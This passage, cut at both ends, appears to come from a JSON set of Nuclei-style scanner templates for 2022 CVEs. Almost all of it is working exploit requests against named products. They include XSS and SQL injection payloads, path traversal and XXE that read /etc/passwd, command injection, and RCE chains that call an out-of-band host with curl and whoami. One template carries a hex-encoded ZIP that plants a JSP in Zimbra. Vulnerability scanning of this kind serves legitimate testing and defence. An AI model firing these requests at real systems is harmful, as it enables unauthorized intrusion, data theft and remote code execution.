application/x-www-form-urlencoded\n\naction=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=\n"],"payloads":{"xss_payload":["<form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<form><math><img onerror=alert(document.domain) src=1><mtext>","td-block-"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-45038","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/ HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n","GET /search/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Results For"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24260","info":{"name":"VoipMonitor - Pre-Auth SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"success\":true","_vm_version","_debug"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2022-40734","info":{"name":"Laravel Filemanager v2.5.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd","{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"],"stop-at-first-match":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","&lt;RegKey&gt;","&lt;IsAdmin&gt;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-0954","info":{"name":"Microweber <1.2.11 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/save_option HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\noption_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother\n","POST /module/ HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\nmodule=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,\"true\")","contains(body_3,'\\\"><img src=\\\"x\\\" onerror=\\\"alert(document.domain);\\\">\\\" placeholder=\\\"Use default')","contains(header_3,\"text/html\")","status_code_3==200"],"condition":"and"}]}]},{"id":"CVE-2022-24265","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/menu/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"menu/html/edit.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-34753","info":{"name":"SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /delsnap.pl?name=|id HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-43016","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["EVAL=<script>alert(document.domain)</script>","cats_connected"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39986","info":{"name":"RaspAP 2.8.7 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncfg_id=;id;#\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40127","info":{"name":"AirFlow < 2.4.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n","@timeout: 15s\nPOST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"conf\": {\n\"dag_run\": \"{{randstr}}\"\n},\n  \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n  \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["state\": \"queued\""]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  <ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-24181","info":{"name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /iupjournals/index.php/esj HTTP/2\nHost: {{Hostname}}\nX-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><x=\".com/iupjournals"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32094","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/doctor/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Doctor  | Dashboard</title>","View Appointment History"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-31982","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26159","info":{"name":"Ametys CMS Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auto-completion>","<item>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: WordPress"]}]}]},{"id":"CVE-2022-32022","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3D'1'%23&password=admin\n","GET /admin/index.php?page=home HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome back Administrator!","action=logout","Manage Account"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-31656","info":{"name":"VMware - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","<servlet-name>"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43165","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-37042","info":{"name":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\n\n{{hex_decode(\"504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000\")}}\n","GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1","/service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd"]},"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 401","status_code_2 == 200","contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"],"condition":"and"}]}]},{"id":"CVE-2022-0437","info":{"name":"karma-runner DOM-based Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/karma.js","{{BaseURL}}/?return_url=javascript:alert(document.domain)"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 6.3.14')"]},{"type":"word","part":"body_2","words":["Karma"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)VERSION: '([0-9.]+)'"],"internal":true}]}]},{"id":"CVE-2022-1595","info":{"name":"WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure","severity":"medium"},"requests":[{"raw":["HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: valid_login_slug=1\n","HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(header_1, 'wordpress_')","contains(header_1, 'Location')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 != 302"]}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1598","info":{"name":"WordPress WPQA <5.5 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/asked-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"rendered\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"</script><script>alert(document.cookie);</script>","text: \"</script><script>alert(document.cookie);</script>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24112","info":{"name":"Apache APISIX - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apisix/batch-requests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\n  \"headers\":{\n    \"X-Real-IP\":\"127.0.0.1\",\n    \"Content-Type\":\"application/json\"\n  },\n  \"timeout\":1500,\n  \"pipeline\":[\n    {\n      \"method\":\"PUT\",\n      \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n      \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n    }\n  ]\n}\n","GET /api/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"reason\":\"OK\"","\"status\":200"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-25488","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/{{md5(num)}}","avatar-container"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44951","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File 